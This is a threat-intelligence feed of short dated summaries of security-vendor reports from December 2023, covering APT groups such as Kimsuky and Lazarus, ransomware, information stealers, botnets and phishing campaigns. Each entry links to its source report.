Intel Name:: Kimsuky_threat_group_is_targeting_research_institutes_in_South_Korea

Date of Scan:: 2023-12-18

Impact:: LOW

Summary:: The North Korean state-backed threat group known as Kimsuky is targeting research institutes in South Korea with spear-phishing to infect the target systems with backdoor trojans and ultimately execute commands for stealing sensitive data.

Source: https://f1tym1.com/2023/12/18/rewterz-threat-alert-kimsuky-apt-uses-backdoor-attacks-on-south-korean-research-institutes-active-iocs/

Intel Source:: Nsfocus

Intel Name:: Xorbot_Botnet_Family

Date of Scan:: 2023-12-18

Impact:: LOW

Summary:: NSFOCUS Global Threat system observed some elf file that was being widely spread by a large amount of suspected encrypted outbound communication traffic. But the detection engine did not detect it. After further deep analysis, it was identified as a novel botnet family with a deep hidden mystery. Given that the family uses multiple rounds of xor operations in encryption and decryption algorithms, NSFOCUS Research Labs named the Trojan xorbot.

Source: https://nsfocusglobal.com/xorbot-a-stealthy-botnet-family-that-defies-detection/

Intel Source:: Thedfirreport

Intel Name:: Unveiling_a_Year_of_Covert_Operations_Profiling_a_Stealthy_Threat_Actor

Date of Scan:: 2023-12-18

Impact:: LOW

Summary:: This report provides a unique analysis by exploring data from the perspective of a threat actor's exposed host. Discovered in an open directory, the amassed data spans over a year, unveiling a historical narrative of the threat actor's operations. While primarily non-financially motivated, the actor strategically targeted an array of sectors, including government, defense contractors, finance, critical infrastructure, telecommunications, and escort services. Operating exclusively with open-source tools, the threat actor demonstrated a diverse skill set, employing active scanning, reconnaissance, and targeted exploits.

Source: https://thedfirreport.com/2023/12/18/lets-opendir-some-presents-an-analysis-of-a-persistent-actors-activity/

Intel Source:: sophos

Intel Name:: Pig_Butchering_Scams_Deep_Dive_into_Cryptocurrency_Confidence_Schemes

Date of Scan:: 2023-12-18

Impact:: LOW

Summary:: Cryptocurrency-based crime, particularly "pig butchering" scams, has evolved into sophisticated confidence schemes. Perpetrators use dating apps to establish relationships, leveraging generative AI to craft convincing messages. Investigating these scams reveals a complex web of interconnected domains and contract wallets, with scams evolving to avoid detection. The study unveils a multimillion-dollar network, emphasizing the need for public awareness and vigilance against the maturing tactics employed by organized crime rings in the cryptocurrency space.

Source: https://news.sophos.com/en-us/2023/12/18/luring-with-love-defi-mining-scam-indepth/

Intel Source:: Seqrite

Intel Name:: BATLOADER_2_X_Threat_of_Stealthy_Malware_Tactics

Date of Scan:: 2023-12-18

Impact:: LOW

Summary:: Seqrite analysts analyzed an attack where Batloader loads the payload, and it is a stealer this time. Batloader is not a new malware in the series – it is an emerging one.

Source: https://www.seqrite.com/blog/decoding-batloader-2-x-unmasking-the-threat-of-stealthy-malware-tactics/

Intel Source:: SANS

Intel Name:: Unearthing_a_Scripted_Assault_on_RocketMQ

Date of Scan:: 2023-12-18

Impact:: LOW

Summary:: Delving into the aftermath of the CVE-2023-33246 vulnerability in RocketMQ, this report spotlights a malicious Bash script discovered in the wild. Operating surreptitiously, the script dynamically creates an environment, installs dependencies, and leverages the masscan port scanner to identify vulnerable servers. Specifically targeting open ports associated with RocketMQ, the script then employs a Python counterpart for the actual exploitation

Source: https://isc.sans.edu/diary/rss/30492

Intel Source:: Infoblox

Intel Name:: The_Lazarus_Group_Releases_KandyKorn

Date of Scan:: 2023-12-15

Impact:: MEDIUM

Summary:: KandyKorn is a highly sophisticated and dangerously formidable remote access trojan (RAT). Lazarus Group’s use of the KandyKorn malware tool highlights the group’s continued build-out of sophisticated tools and the growing dangers of their cyberattacks. Infoblox shared in their blog that threat actors have refined their techniques, causing most of the potential damage before malicious domains are identified and shared through open-source intelligence (OSINT) and the majority of commercial threat intel feeds.

Source: https://blogs.infoblox.com/cyber-threat-intelligence/dns-for-early-detection-lazarus-kandykorn/

Intel Source:: Trustwave

Intel Name:: Honeypot_Recon_for_MySQL_Malware_Infection

Date of Scan:: 2023-12-15

Impact:: LOW

Summary:: Trustwave took a closer look at the infection mechanisms to get a better picture of this process. They recently surfaced in MySQL servers, leveraging SQL commands to infiltrate stealthily, deploy, and activate malicious payloads. And how they are constantly evolving, changing behavior, and adjusting infection techniques.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/

Intel Source:: Resecurity

Intel Name:: The_BianLian_White_Rabbit_and_Mario_ransomware_gangs_collaboration

Date of Scan:: 2023-12-15

Impact:: MEDIUM

Summary:: A ransomware attack on a financial services firm in the APAC region used tactics such as password spraying, BEC emails, and compromised third-party accounts. Evidence suggests the attack was conducted by a trinity of ransomware gangs, White Rabbit, Mario, and Ransomhouse, who threatened to report the victim to regulators if they failed to pay the ransom. The attack further highlights the vulnerability of VPNs to ransomware attackers.

Source: https://www.resecurity.com/blog/article/Exposing-Cyber-Extortion-Trinity-BianLian-White-Rabbit-Mario-Ransomware-Gangs-Spotted-Joint-Campaign

Intel Source:: Malwarebytes

Intel Name:: PikaBot_distributed_via_malicious_search_ads

Date of Scan:: 2023-12-15

Impact:: LOW

Summary:: Recently, researchers have noticed PikaBot, a new malware family that first showed up at the beginning of 2023, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns similar to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads

Intel Source:: Checkpoint

Intel Name:: RHADAMANTHYS_V_0_5_0

Date of Scan:: 2023-12-14

Impact:: LOW

Summary:: Check Point Research team provided in their analysis a detailed view of agent modules, presenting their capabilities and implementation, focusing on how the stealer components are loaded and how they work. Rhadamanthys is an information stealer with a diverse set of modules and an interesting multilayered design.

Source: https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/

Intel Source:: Welivesecurity

Intel Name:: OilRig_persistent_attacks

Date of Scan:: 2023-12-14

Impact:: MEDIUM

Summary:: Researchers from Welivesecurity have analyzed a growing series of downloaders used by the OilRig cyber espionage group to maintain access to Israeli targets of special interest, in their blogpost published on 14 December 2023.

Source: https://www.welivesecurity.com/en/eset-research/oilrig-persistent-attacks-cloud-service-powered-downloaders/

Intel Source:: Securelist

Intel Name:: NKAbuse_a_new_multiplatform_threat

Date of Scan:: 2023-12-14

Impact:: LOW

Summary:: Securelist discovered a new multiplatform threat “NKAbuse”. The malware using NKN technology for data exchange and backdoor capabilities. Their analysis assume that the main target of NKAbuse is Linux desktops. But possible is to infect MISP and ARM systems and could poses a threat to IoT devices.

Source: https://securelist.com/unveiling-nkabuse/111512/

Intel Source:: Group-IB

Intel Name:: GambleForce_campaign_carries_SQL_injection_attacks

Date of Scan:: 2023-12-14

Impact:: LOW

Summary:: Group-IB’s Threat Intelligence team observed since September 2023 that GambleForce threat actor has targeted more than 20 websites (government, gambling, retail, and travel) in Australia, China, Indonesia, the Philippines, India, South Korea, Thailand, and Brazil. After doing their deep analyses and the toolset in more detail, the analysts concluded that the tools were most likely associated with a threat actor executing one of the oldest attack methods: SQL injections.

Source: https://www.group-ib.com/blog/gambleforce-gang/

Intel Source:: Sentinelone

Intel Name:: Recent_Gaza_Cybergang_activities

Date of Scan:: 2023-12-14

Impact:: MEDIUM

Summary:: SentinelLabs’ analysis reinforces the suspected ties between Gaza Cybergang and WIRTE, historically considered a distinct cluster with loose relations to the Gaza Cybergang.

Source: https://www.sentinelone.com/labs/gaza-cybergang-unified-front-targeting-hamas-opposition/

Intel Source:: Lumen

Intel Name:: KV_Botnet_Investigation

Date of Scan:: 2023-12-14

Impact:: LOW

Summary:: The Black Lotus Labs team at Lumen Technologies is tracking a small office/home office (SOHO) router botnet that forms a covert data transfer network for advanced threat actors. They called this KV-botnet. The campaign infects devices at the edge of networks, a segment that has emerged as a soft spot in the defensive array of many enterprises.

Source: https://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/

Intel Source:: Welivesecurity

Intel Name:: The_discovered_cluster_of_malicious_Python_projects

Date of Scan:: 2023-12-14

Impact:: LOW

Summary:: ESET Research discovered 116 malicious packages in PyPI, the official repository of software for the Python programming language, uploaded in 53 projects. The malware delivers a backdoor capable of remote command execution, exfiltration, and taking screenshots. The backdoor component is implemented for both Windows, in Python, and Linux, in Go.

Source: https://www.welivesecurity.com/en/eset-research/pernicious-potpourri-python-packages-pypi/

Intel Source:: Seqrite

Intel Name:: Unraveling_Cerber_Ransomware

Date of Scan:: 2023-12-13

Impact:: MEDIUM

Summary:: This analysis delves into the intricacies of Cerber ransomware, a malicious software identified in 2016. Cerber employs advanced techniques, such as custom-packing its payload, using mutex validation to prevent reinfection, and configuring Windows firewall rules for evading security tools. The ransomware communicates through a specific protocol, employs RSA and RC4 algorithms for encryption, and employs a self-deletion mechanism post-infection. To safeguard against Cerber and similar threats, the analysis recommends precautionary measures, including regular data backups, software updates, strong password usage, and vigilant email practices.

Source: https://www.seqrite.com/blog/cerber-ransomware-exposed-a-comprehensive-analysis-of-advanced-tactics-encryption-and-evasion/

Intel Source:: securelist

Intel Name:: FakeSG_RAT_Campaign_Akira_Ransomware_and_AMOS_Stealer_Insights

Date of Scan:: 2023-12-13

Impact:: MEDIUM

Summary:: Explore the dynamic landscape of crimeware through a detailed examination of three distinct threats: the FakeSG campaign utilizing NetSupport RAT, the Akira ransomware affecting both Windows and Linux environments, and the AMOS stealer targeting macOS users. Delve into the FakeSG campaign's deceptive browser update tactics, Akira's sophisticated ransomware techniques resembling Conti, and the AMOS stealer's evolution from Go to C language.

Source: https://securelist.com/crimeware-report-fakesg-akira-amos/111483/

Intel Source:: CISA

Intel Name:: Exploitation_of_JetBrains_TeamCity_CVE_Globally

Date of Scan:: 2023-12-13

Impact:: MEDIUM

Summary:: The FBI, U.S. CISA, U.S. NSA, Polish Military Counterintelligence Service, CERT Polska (CERT.PL), and the UK’s NCSC concluded the JetBrains TeamCity software was exploited by Russian cyber actors APT 29 aka the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard with CVE-2023-42793 at a massive spread, targeting servers hosting that JetBrains TeamCity software last couple months.

Source: https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.pdf

Intel Source:: Malwarebytes

Intel Name:: An_increase_of_malicious_ads_on_Google_searches_for_Zoom

Date of Scan:: 2023-12-13

Impact:: LOW

Summary:: This month, Malwarebytes researchers have noticed a spike of malicious ads on Google searches for “Zoom”, the video conferencing software. Threat actors have been switching and changing between different keywords for software downloads such as “Advanced IP Scanner” or “WinSCP” normally geared toward IT administrators. So researchers shared the details of two cases: 1st - about a new loader which we have not seen mentioned publicly before called HiroshimaNukes and 2nd - a campaign dropping FakeBat loader where the threat actor tracked victims via a panel that was new to us, called Hunting panel 1.40.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/malvertisers-zoom-in-on-cryptocurrencies-and-initial-access

Intel Source:: Sentilone

Intel Name:: Mallox_Resurrected

Date of Scan:: 2023-12-13

Impact:: MEDIUM

Summary:: Sentilone analysts shared their summary and report of recent Mallox activity, explained the group’s initial access methods, and provided a high-level analysis of recent Mallox payloads. Up today this group continues to steal and leak a steady stream of enterprise data.

Source: https://www.sentinelone.com/blog/mallox-resurrected-ransomware-attacks-exploiting-ms-sql-continue-to-burden-enterprises/

Intel Source:: Stairwell

Intel Name:: Kuiper_ransomware_analysis

Date of Scan:: 2023-12-13

Impact:: LOW

Summary:: At the beginning of this month, Stairwell researchers got a copy of a server that was suspected operated by the developers of the Kuiper ransomware. Their report will have an overview of Stairwell researcher's findings and a technical analysis of the ransomware.

Source: https://stairwell.com/resources/kuiper-ransomware-analysis-stairwells-technical-report/

Intel Source:: Proofpoint

Intel Name:: TA4557_Targets_Recruiters_Directly_via_Email

Date of Scan:: 2023-12-12

Impact:: LOW

Summary:: Recently, Proofpoint observed an attack from the TA455 campaign which used both the new method of attacks where recruiters send emails directly as well as the older technique of applying to jobs posted on job boards starting off the attack chain. Specifically, in the attack chain that uses the direct email technique, once the recipient responds to the initial email, the actor is observed responding with a URL linking to an actor-controlled website posing as a candidate's resume.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta4557-targets-recruiters-directly-email?

Intel Source:: PaloAlto

Intel Name:: A_series_of_related_attacks_against_organizations_with_new_tool_set

Date of Scan:: 2023-12-12

Impact:: MEDIUM

Summary:: Unit 42 researchers observed a series of apparently related attacks against organizations in the Middle East, Africa and the U.S. Unit 42 is sharing these results with the purpose of helping organizations defend against the tools observed here.

Source: https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/

Intel Source:: X-Force

Intel Name:: The_delivery_of_the_ITG05_campaign_exclusive_Headlace_backdoor

Date of Scan:: 2023-12-12

Impact:: MEDIUM

Summary:: X-Force observed the ITG05 campaign which is likely a Russian state-sponsored group related to the ongoing Israel-Hamas war to assist the delivery of a custom backdoor called HeadLace. This new campaign is against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance, and diplomatic centers," security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said.

Source: https://securityintelligence.com/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware/

Intel Source:: Rewterz

Intel Name:: APT37_also_known_as_ScarCruft_or_Red_Eyes_activity

Date of Scan:: 2023-12-12

Impact:: MEDIUM

Summary:: APT37, aka ScarCruft or Red Eyes, is a state-sponsored cyber espionage group originating from North Korea. The group has been active for more than 10 years and targeted previous victims in South Korea. This time it started attacks against entities in other countries, including Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and various parts of the Middle East. One of the threats APT37 has been associated with is the Goldbackdoor and RokRAT.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt37-aka-scarcruft-or-redeyes-active-iocs-2/

Intel Source:: Elastic

Intel Name:: The_updated_GULOADER_analysis

Date of Scan:: 2023-12-12

Impact:: LOW

Summary:: Elastic Security Labs researchers follow on the active threat monitor active threats like GULOADER, aka CloudEyE which is a very triccking shellcode downloader that has been highly active for years while under constant development. One of these recent changes is the addition of exceptions to its Vectored Exception Handler (VEH) in a fresh campaign.

Source: https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader

Intel Source:: ASEC

Intel Name:: Malicious_Backdoor_Disguised_as_Data_Leak_Material_in_Targeted_Campaign

Date of Scan:: 2023-12-11

Impact:: LOW

Summary:: AhnLab Security Emergency Response Center (ASEC) has identified a targeted campaign distributing a malicious executable file disguised as personal data leak material. The malware functions as a backdoor, receiving obfuscated commands in XML format from threat actors. Although the final behavior could not be observed due to the closure of the command and control (C2) server, the malware involves the creation of obfuscated files, including legitimate doc files, to deceive users. The threat actor employs various scripts, such as Operator.jse and WindowsHotfixUpdate.ps1, creating a complex execution chain

Source: https://asec.ahnlab.com/en/59763/

Intel Source:: Cyble

Intel Name:: New_Editbot_Stealer_Spreads

Date of Scan:: 2023-12-11

Impact:: LOW

Summary:: Cyble researchers observed a WinRAR archive file on VirusTotal with minimal detection. Their analysis indicated that it is part of a new campaign targeted at Social Media users. This campaign attack surrounds a multi-stage attack, where each phase has a particular role, such as evading detection, downloading additional payloads, or gaining persistence on the victim’s system.

Source: https://cyble.com/blog/new-editbot-stealer-spreads-via-social-media-messages/

Intel Source:: Group-IB

Intel Name:: New_Linux_Remote_Access_Trojan

Date of Scan:: 2023-12-11

Impact:: LOW

Summary:: The Group-IB Threat Intelligence unit shared their insights on existing Linux Remote Access Trojan (RAT) Krasue. This RAT has been used against organizations in Thailand. Krasue poses a severe risk to critical systems and sensitive data, which could grant attackers remote access to the targeted network. The malware also features rootkits embedded in the binary. Group-IB researchers also confirmed that Krasue was used against telecommunications companies, although it has likely been leveraged in attacks against organizations in other verticals. The Group-IB team in their insights shared the Krasue’s key characteristics, its functionalities, potential impact, and the measures that organizations should take to defend against the evolving threat.

Source: https://www.group-ib.com/blog/krasue-rat/

Intel Source:: Lab52

Intel Name:: Mustang_Panda_s_PlugX_new_variant_attacks

Date of Scan:: 2023-12-11

Impact:: LOW

Summary:: The Lab52 team did team analyses of the campaign in which attackers started a new variant of the PlugX malware. The details and the various artifacts used showed that it has a lot of similarities with the SmugX campaign, attributed to threat actors Red Delta and Mustang Panda, allegedly linked to the Chinese government. The analysts observed that these attacks are targeted against Taiwanese government and diplomats.

Source: https://lab52.io/blog/mustang-pandas-plugx-new-variant-targetting-taiwanese-government-and-diplomats/

Intel Source:: Sentilone

Intel Name:: Sandman_APT

Date of Scan:: 2023-12-11

Impact:: MEDIUM

Summary:: SentinelLabs, Microsoft, and PwC threat intelligence researchers shared the joint report with the information on the Sandman APT cluster. They saw links between Sandman and a suspected China-based threat actor using the shared KEYPLUG backdoor – STORM-0866/Red Dev 40. Their report included victimology overlaps, cohabitation, and sharing C2 infrastructure control and management practices.

Source: https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/

Intel Source:: Talos

Intel Name:: Operation_Blacksmith

Date of Scan:: 2023-12-11

Impact:: MEDIUM

Summary:: This month Cisco Talos researchers discovered a new campaign “Operation Blacksmith” made by the Lazarus Group using three new DLang-based malware families, two of which are remote access trojans (RATs), it uses Telegram bots and channels as a medium of command and control (C2) communications. Researchers linked this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”

Source: https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/

Intel Source:: Trendmicro

Intel Name:: Unraveling_the_Complex_AsyncRAT_Infection_Chai

Date of Scan:: 2023-12-11

Impact:: MEDIUM

Summary:: Trend Micro's Managed XDR (MxDR) team has conducted an in-depth analysis of the AsyncRAT (Remote Access Tool) infection chain, revealing the tool's sophisticated capabilities, including keylogging and remote desktop control. The blog post explores the misuse of the legitimate Microsoft process aspnet_compiler.exe by malicious actors, shedding light on evolving adversary tactics. The investigation details the entire timeline of events, from the initial download to the establishment of command-and-control connections. The analysis highlights AsyncRAT's adaptability across diverse attack vectors, including phishing campaigns and ransomware infections.

Source: https://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html

Intel Source:: Sucuri

Intel Name:: The_evolution_of_the_ATMZOW_skimmer

Date of Scan:: 2023-12-09

Impact:: LOW

Summary:: Sucuri research team shared their deep look into recent Google Tag Manager containers used in e-commerce malware, examine some newer forms of obfuscation techniques used in the malicious code, and tracked the evolution of the ATMZOW skimmer linked to widespread Magento website infections since 2015.

Source: https://blog.sucuri.net/2023/12/40-new-domains-of-magecart-veteran-atmzow-found-in-google-tag-manager.html

Intel Source:: Esentire

Intel Name:: Exploitation_of_Qlik_Sense_servers

Date of Scan:: 2023-12-09

Impact:: LOW

Summary:: eSentire has seen multiple instances of threat actors exploiting vulnerabilities in Qlik Sense to get initial access into victim organizations. Qlik Sense is a data analytics platform; there is a high probability that Qlik Sense servers are unpatched and internet-facing, and will be targeted in an ongoing campaign.

Source: https://www.esentire.com/security-advisories/qlik-sense-exploitation

Intel Source:: Esentire

Intel Name:: DanaBot_trojan_deploying_IcedID

Date of Scan:: 2023-12-09

Impact:: LOW

Summary:: Last month, the eSentire Threat Response analysts observed again DanaBot, a banking Trojan renowned for its ability to steal banking credentials, personal information, and hVNC. This malware was being employed to deliver IcedID, a banking Trojan.

Source: https://www.esentire.com/blog/danabots-latest-move-deploying-icedid

Intel Source:: Cyberint

Intel Name:: Israel_Hamas_vs_Ukraine_Russia_cyber_war

Date of Scan:: 2023-12-09

Impact:: MEDIUM

Summary:: The conflict that happened in Israel on the morning of October 7 between Israel and Hamas, has not only engaged physical battlegrounds but has also drawn the multiple threat actors in cyberspace as well as in the Russian-Ukrainian conflict. Cyberint shared their deep analysis of all cases that happened during these 2 different wars.

Source: https://cyberint.com/blog/research/israel-hamas-vs-ukraine-russia-war/

Intel Source:: Esentire

Intel Name:: The_exploits_for_Citrix_Bleed_are_in_the_wild

Date of Scan:: 2023-12-09

Impact:: HIGH

Summary:: 2 months ago, the eSentire team some alerts, and after investigating it was tied to a LockBit ransomware attack. The first indicators included Rclone activity and connections to the known malicious C2 domain megapackup[.]com. The eSentire Threat Response Unit continued an investigation of this malicious activity and with confidence concluded that the threat actor gained the initial access via the Citrix Bleed vulnerability (CVE-2023-4966) affecting Citrix NetScaler ADC and NetScaler Gateway, which allow the attackers to bypass authentication by retrieving the session tokens. The exploits for Citrix Bleed are available in the wild, and the vulnerability is being actively discussed on Russian hacking forums.

Source: https://www.esentire.com/blog/citrix-bleed-vulnerability-a-gateway-to-lockbit-ransomware

Intel Source:: Fortinet

Intel Name:: MrAnon_Stealer_Spreads_via_Email

Date of Scan:: 2023-12-09

Impact:: MEDIUM

Summary:: This month FortiGuard Labs discovered an email phishing campaign using misleading booking information to attempt victims into clicking on a malicious PDF file. These malicious PDF downloads run a PowerShell script to bring the MrAnon Stealer malware. This malware is a Python-based information stealer condensed with cx-Freeze to vaporize detection. MrAnon Stealer steals its victims' credentials, system information, browser sessions, and cryptocurrency extensions.

Source: https://www.fortinet.com/blog/threat-research/mranon-stealer-spreads-via-email-with-fake-hotel-booking-pdf

Intel Source:: PaloAlto

Intel Name:: Fighting_Ursa_two_malicious_campaigns

Date of Scan:: 2023-12-09

Impact:: MEDIUM

Summary:: Unit 42 researchers have observed this group Fighting Ursa APT28 using this a zero-day exploit in Microsoft Outlook CVE-2023-23397 vulnerability over the past 20 months to target at least 30 organizations within 14 nations that are of likely strategic intelligence value to the Russian government and its military. This time this threat actor group conducted at least two campaigns with this vulnerability that have been made public.

Source: https://unit42.paloaltonetworks.com/russian-apt-fighting-ursa-exploits-cve-2023-233397/

Intel Source:: ASEC

Intel Name:: Malware_creation_by_Kimsuky_Group_using_AutoIt

Date of Scan:: 2023-12-09

Impact:: MEDIUM

Summary:: ASEC is constantly following the Kimsuky group’s attacks using LNK-type malware and studying their attack cases. The Kimsuky group installs remote control malware to control the infected system to gain initial access. Kimsuky's malware also includes open-source or commercial malware such as XRat, HVNC, Amadey, and Metasploit Meterpreter. This time ASEC analyzed Amadey and RftRAT which were recently found being distributed.

Source: https://asec.ahnlab.com/en/59590/

Intel Source:: Domaintools

Intel Name:: Merry_Phishmas_phishing_activities

Date of Scan:: 2023-12-08

Impact:: LOW

Summary:: During the holidays, DomainTools is warning the public to stay extremely careful against the threat of USPS package redelivery phishing attacks. DomainTools is monitoring several USPS phishing campaigns, which include activity that coordinates with known tactics, techniques, and procedures of the China-based “Chenlun” phishing actor and their affiliates groups.

Source: https://www.domaintools.com/resources/blog/merry-phishmas-beware-us-postal-service-phishing-during-the-holidays/

Intel Source:: CISA, Microsoft

Intel Name:: Star_Blizzard_increases_sophistication_and_evasion_in_ongoing_attacks

Date of Scan:: 2023-12-07

Impact:: HIGH

Summary:: The CISA, UK-NCSC, Australian Signals Directorate’s Australian Cyber Security Centre, Canadian Centre for Cyber Security), New Zealand National Cyber Security Centre, and the U.S. NSA, FBI, and Cyber Command Cyber National Mission Force (CNMF) shared their security warning about Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. This threat actor used to be known as SEABORGIUM, also Callisto Group/TA446/COLDRIVER/TAG-53/BlueCharlie continues to use spear-phishing campaigns against targeted organizations and individuals in the UK, and other geographical areas of interest, for information-gathering activity.

Source: https://www.cisa.gov/news-events/alerts/2023/12/07/cisa-and-international-partners-release-advisory-russia-based-threat-actor-group-star-blizzard https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/

Intel Source:: Patchstack

Intel Name:: A_huge_spike_scale_phishing_campaign

Date of Scan:: 2023-12-07

Impact:: LOW

Summary:: The Patchstack team has been keeping eye on a huge spike scale phishing campaign with different variants of phishing emails going around that are notifying users about a new security vulnerability in their WordPress website, supposedly a “Remote Code Execution (RCE)” vulnerability “CVE-2023-45124” and asked to patch right away by using a “Patch created by the WordPress Team”. The email was a fake and the plugin asked to download and install was malicious and can infect your website with a backdoor and malicious administrator account.

Source: https://patchstack.com/articles/fake-cve-phishing-campaign-tricks-wordpress-users-to-install-malware/

Intel Source:: Splunk

Intel Name:: Detailed_analysis_of_PlugX_Malware

Date of Scan:: 2023-12-07

Impact:: LOW

Summary:: The Splunk researchers team shared their deep analysis on a PlugX variant, uncovering all sides of malicious payload, tactics, and impact on the digital realm, including: PlugX .DAT Payload Extraction, PlugX .CFG Decryption, PlugX Extractor Tool, PlugX Analysis.

Source: https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html

Intel Source:: Securelist

Intel Name:: New_Trojan_BlueNoroff_loader_attacking_macOS_users

Date of Scan:: 2023-12-06

Impact:: LOW

Summary:: Securelist uncovered a new variety of malicious loader that attacks macOS, suspected to be the BlueNoroff APT gang and the known campaign RustBucket. The threat actor is known to attack financial organizations tied to the activity is related to cryptocurrency, as well as individuals who hold crypto assets or take an interest in the subject.

Source: https://securelist.com/bluenoroff-new-macos-malware/111290/

Intel Source:: Securelist

Intel Name:: New_macOS_Trojan_Proxy_piggybacking_on_cracked_software

Date of Scan:: 2023-12-06

Impact:: LOW

Summary:: Securelist researchers identified several ruptured applications spread by illegal websites and loaded with a Trojan-Proxy. Attackers use this malware to gain money by building a proxy server network or to perform illegal activities on behalf of the victim: to launch attacks on websites, companies, and individuals, and buy guns, drugs, and other illicit goods.

Source: https://securelist.com/trojan-proxy-for-macos/111325/

Intel Source:: ASEC

Intel Name:: WSF_Script_Variant_of_AsyncRAT_Malware_Campaign

Date of Scan:: 2023-12-06

Impact:: MEDIUM

Summary:: A recent analysis by the AhnLab Security Emergency Response Center (ASEC) reveals a shift in the distribution method of the AsyncRAT malware. Previously distributed through files with the .chm extension, the malware is now using WSF script format, found in compressed (.zip) files distributed via email URLs. The WSF script, when executed, triggers a sequence of events, downloading and running Visual Basic scripts that ultimately execute the AsyncRAT malware. The campaign employs fileless attack techniques, bypassing UAC and utilizing various scripts to maintain persistence, collect system information, and exfiltrate data.

Source: https://asec.ahnlab.com/en/59573/

Intel Source:: Unit42

Intel Name:: Unidentified_Infostealer_Dec5

Date of Scan:: 2023-12-06

Impact:: LOW

Summary:: Loader EXE leads to unidentified malware with C2 using encoded/encrypted TCP traffic on 91.92.120[.]119.

Source: https://twitter.com/Unit42_Intel/status/1732411660013273387 https://www.linkedin.com/posts/unit42_malwaretraffic-timelythreatintel-unit42threatintel-activity-7138177279964151809--S66/

Intel Source:: Perception point

Intel Name:: Multi_Layered_Invoice_Campaign_Unveils_Stealthy_LUMMA_InfoStealer_Attack

Date of Scan:: 2023-12-05

Impact:: MEDIUM

Summary:: Researchers at Perception Point recently uncovered a sophisticated malware attack leveraging a multi-layered fake invoice campaign. The threat actor, impersonating a financial services company, prompts users to click on a seemingly legitimate invoice link, creating an evasion tactic. The attacker exploits a breached website to redirect users, initiating the download of a JavaScript file containing the LUMMA InfoStealer malware. LUMMA, distributed through Malware-as-a-Service, executes complex processes from unusual locations, adding layers of obfuscation to the attack.

Source: https://perception-point.io/blog/behind-the-attack-lumma-malware/

Intel Source:: Bolster

Intel Name:: Vast_Parcel_Delivery_Phishing_Campaign

Date of Scan:: 2023-12-05

Impact:: LOW

Summary:: Bolsters’s researchers have discovered new scam tactics. It is a domain impersonating Walmart, precesely designed to mimic the appearance of the USPS.com website.

Source: https://bolster.ai/blog/usps-phishing-campaign

Intel Source:: CISA

Intel Name:: Exploitation_of_Adobe_ColdFusion_or_Initial_Access_to_Government_Servers

Date of Scan:: 2023-12-05

Impact:: HIGH

Summary:: The CISA has released a Cybersecurity Advisory to confirm the exploitation of CVE-2023-26360 by unknown threat actors at a Federal Civilian Executive Branch (FCEB) agency. This vulnerability is about an improper access control issue impacting Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier). Exploitation of this CVE can result in arbitrary code execution.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-339a

Intel Source:: CuratedIntel

Intel Name:: Global_credit_card_information_campaigns_targeting_users_in_different_services

Date of Scan:: 2023-12-05

Impact:: LOW

Summary:: Tas and Curated Intel researchers shared their discovery on the newly observed method of phishing utilizing chat functionality in multiple web/mobile applications. This campaign of phishing introduced a novel TTP of utilizing the postal, reservation, and e-commerce services chat functionality.

Source: https://www.curatedintel.org/2023/12/curated-intel-threat-report-multi.html

Intel Source:: Proofpoint

Intel Name:: TA422_s_Dedicated_Exploitation

Date of Scan:: 2023-12-05

Impact:: MEDIUM

Summary:: Since the middle of the year 2023, Proofpoint researchers have observed regular TA422 (APT28) phishing activity, where the threat actor leveraged patched vulnerabilities including CVE-2023-23397 to send, at times, high-volume campaigns to targets in Europe and North America. TA422 used the vulnerabilities as initial access against government, aerospace, education, finance, manufacturing, and technology sector targets likely to either disclose user credentials or initiate follow-on activity.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta422s-dedicated-exploitation-loop-same-week-after-week

Intel Source:: Cyfirma

Intel Name:: DanaBot_Stealer

Date of Scan:: 2023-12-05

Impact:: MEDIUM

Summary:: Cyfirma analysts provided their comprehensive analysis focuses on the information stealer DanaBot and presents a thorough examination of its functionality and capabilities. DanaBot is a stealthy and versatile malware that infiltrates computers to steal valuable information for monetization. Unlike ransomware that demands immediate payment, DanaBot operates discreetly, prioritizing long-term persistence and the theft of sensitive data.

Source: https://www.cyfirma.com/outofband/danabot-stealer-a-multistage-maas-malware-re-emerges-with-reduced-detectability/

Intel Source:: Blackberry

Intel Name:: New_Cyber_Espionage_Threat_Targets_US_Aerospace_Industry

Date of Scan:: 2023-12-05

Impact:: LOW

